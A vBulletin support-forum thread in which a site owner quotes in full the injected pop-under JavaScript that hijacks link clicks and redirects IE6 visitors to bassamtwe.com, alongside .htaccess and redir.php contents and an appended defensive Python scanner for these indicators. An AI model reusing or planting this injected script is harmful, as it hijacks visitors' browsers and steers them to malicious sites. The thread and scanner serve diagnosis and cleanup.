Bug on VB 3.6.12 ? bassamtwe.com

  • brasolino
    New Member
    • May 2007
    • 19
    • 3.6.x

    Bug on VB 3.6.12 ? bassamtwe.com

    I'm experiencing problems using vBulletin 3.6.12 with INTERNET EXPLORER [tested on IE6]

    When I try to access my forum using IE6, a new window redirecting to

    Code:
    http://bassamtwe.com/cgi-bin/index.cgi?
    is opened, and editing the final HTML code generated by vBulletin, I found this code on the first string

    Code:
    <script language="javascript">if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "advmaker_komap";var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "http://bassamtwe.com/ld/ment/";var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ( ( utc32 - utc2 ) / 1000 < pop_timeout*60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = 
parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links[i].target != "_blank"){document.links[i].onclick_copy = document.links[i].onclick;document.links[i].onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    Can someone help me to solve it?

    The site seems to be malicious

    Code:
    http://safeweb.norton.com/report/show?name=bassamtwe.com


    thank you!
  • Steve Machol
    Former Customer Support Manager
    • Jul 2000
    • 154488

    #2
    vB 3.6.12 is end-of-life and no longer officially supported. For support and maximum security you need to upgrade to the latest stable version of vB.

    However someone either hacked your server, or hacked your vB to put that redirect in the templates.
    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
    Change CKEditor Colors to Match Style (for 4.1.4 and above)

    Steve Machol Photography


    Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


    Comment

    • brasolino
      New Member
      • May 2007
      • 19
      • 3.6.x

      #3
      Originally posted by Steve Machol
      vB 3.6.12 is end-of-life and no longer officially supported. For support and maximum security you need to upgrade to the latest stable version of vB.

      However someone either hacked your server, or hacked your vB to put that redirect in the templates.
      OK, I have updated to vB 3.8.1 but the problem is still on my forum (spam pointed at another domain): how can I try to fix it?

      Comment

      • Steve Machol
        Former Customer Support Manager
        • Jul 2000
        • 154488

        #4
        That is either from a modification or you have a file on your server that is doing this redirect, possibly an .htaccess file.


        Comment

        • brasolino
          New Member
          • May 2007
          • 19
          • 3.6.x

          #5
          OK, this is the content of .htaccess

          Code:
          RewriteEngine On
          RewriteRule ^((urllist|sitemap).*\.(xml|txt)(\.gz)?)$ vbseo_sitemap/vbseo_getsitemap.php?sitemap=$1 [L]

          ####Charset
          AddDefaultCharset Off

          ####Gzip
          <IfModule mod_rewrite.c>
          RewriteCond %{REQUEST_FILENAME} -f
          RewriteRule ^(.*)(js|css)$ redir.php?file=$1$2&type=$2 [L]
          </IfModule>

          ####ETags
          FileETag None

          ####Expires
          <IfModule mod_expires.c>
          ExpiresActive On
          ExpiresByType image/gif A2592000
          ExpiresByType image/jpeg A2592000
          ExpiresByType image/png A2592000
          ExpiresByType application/x-shockwave-flash A2592000
          ExpiresByType text/css A2592000
          ExpiresByType application/x-javascript A2592000
          </IfModule>
          and this is the content of redir.php

          Code:
          <?php
          # this is the file redir.php, to gzip javascript and css

          # set the request file name
          $file=str_replace(chr(0x0),"",$_REQUEST['file']);
          $allowedfiles = array('js','gif','png','jpg','css','txt','swf');
          if (!in_array(str_replace(chr(0x2E),"",substr(chr(0x2E).$file,-3)),$allowedfiles)){ exit ("Hacking attempt!"); }

          # Set Expires, cache the file on the browser
          header("Expires:".gmdate("D, d M Y H:i:s", time()+15360000)." GMT");
          header("Cache-Control: max-age=315360000");

          # set the last modified time
          $mtime = filemtime($file);
          $gmt_mtime = gmdate('D, d M Y H:i:s', $mtime) . ' GMT';
          header("Last-Modified:" . $gmt_mtime);

          # output a mediatype header
          switch ($_REQUEST['type']){
            case 'css':
              header("Content-type: text/css");
              break;
            case 'js' :
              header("Content-type: text/javascript");
              break;
            default:
              header("Content-type: text/plain");
          }

          # GZIP the content
          if(extension_loaded('zlib')){ob_start();ob_start('ob_gzhandler');}

          # echo the file's contents
          echo implode('', file($file));

          if(extension_loaded('zlib')){
            ob_end_flush();
            # set header the content's length;
            # header("Content-Length: ".ob_get_length()); # (It doesn't work? )
            ob_end_flush();
          }
          ?>
          Is it wrong?

          Comment

          • Steve Machol
            Former Customer Support Manager
            • Jul 2000
            • 154488

            #6
            Temporarily remove or rename your .htaccess file and see if you still have this problem.


            Comment

            • brasolino
              New Member
              • May 2007
              • 19
              • 3.6.x

              #7
              Originally posted by Steve Machol
              Temporarily remove or rename your .htaccess file and see if you still have this problem.
              OK, I have removed .htaccess and the problem was gone, BUT NOW IT IS BACK!

              I'm using vBulletin 3.8.1 PL1: how can I find out if the "trojan" is in the MySQL database? How can I search for it?

              thank you

              Comment

              • brasolino
                New Member
                • May 2007
                • 19
                • 3.6.x

                #8
                Here is the analysis of the problem

                On 9 November 2008, a college university web page hosted obfuscated JavaScript that when decoded revealed an iframe to hxxp://amhvcketn.com/...

                Comment

                • Umut Ceylan
                  Senior Member
                  • Dec 2004
                  • 273
                  • 3.8.x

                  #9
                  Hello,
                  I've the same file, but I find redir.php is a YSLOW script, man, take it easy.
                  Regards
                  Last edited by Umut Ceylan; Wed 1 Jul '09, 12:43am.

                  Comment
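
A defender-side sweep for the indicators visible in this thread, as an added example that is not part of any post: it scans a web root (or a database export saved as a file inside it) for the redirect domain and cookie name from post #1, a script emitted before the doctype, and `auto_prepend_file` directives in `.htaccess`. The function names, the constructed sample files and the `auto_prepend_file` check are assumptions of this example, not findings from the thread.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the injected snippet quoted in post #1.
INDICATORS = {
    "redirect-domain": re.compile(rb"bassamtwe\.com", re.I),
    "popunder-cookie": re.compile(rb"advmaker_komap"),
    # A <script> block emitted before the doctype, as in the poster's page source.
    "script-before-doctype": re.compile(
        rb"\A\s*<script\b.*?</script>\s*<!DOCTYPE", re.I | re.S),
    # Assumed extra check: PHP directive that prepends/appends a file to every page.
    "auto-prepend": re.compile(
        rb"^\s*php_(?:admin_)?value\s+auto_(?:prepend|append)_file", re.I | re.M),
}

def scan_bytes(data):
    """Return the sorted names of all indicators present in data."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(data))

def scan_tree(root, max_bytes=20 * 1024 * 1024):
    """Walk root and map relative path -> matched indicator names."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.is_symlink():
            continue
        with path.open("rb") as fh:
            found = scan_bytes(fh.read(max_bytes))
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits

def build_sample(root):
    """Constructed sample tree: one clean file and three tampered ones."""
    root = Path(root)
    (root / "clean.html").write_bytes(b"<!DOCTYPE html><html></html>")
    (root / "page.html").write_bytes(
        b'<script language="javascript">var pop_cookie_name = "advmaker_komap";'
        b"</script><!DOCTYPE html>")
    (root / ".htaccess").write_bytes(
        b"RewriteEngine On\nphp_value auto_prepend_file /tmp/x.php\n")
    (root / "forum_dump.sql").write_bytes(
        b"INSERT INTO template VALUES ('http://bassamtwe.com/ld/ment/');")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for rel, names in scan_tree(build_sample(tmp)).items():
            print(rel, names)
```

Pointing `scan_tree` at a copy of the forum directory that also holds a SQL export of the database covers both files and stored templates in one pass.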
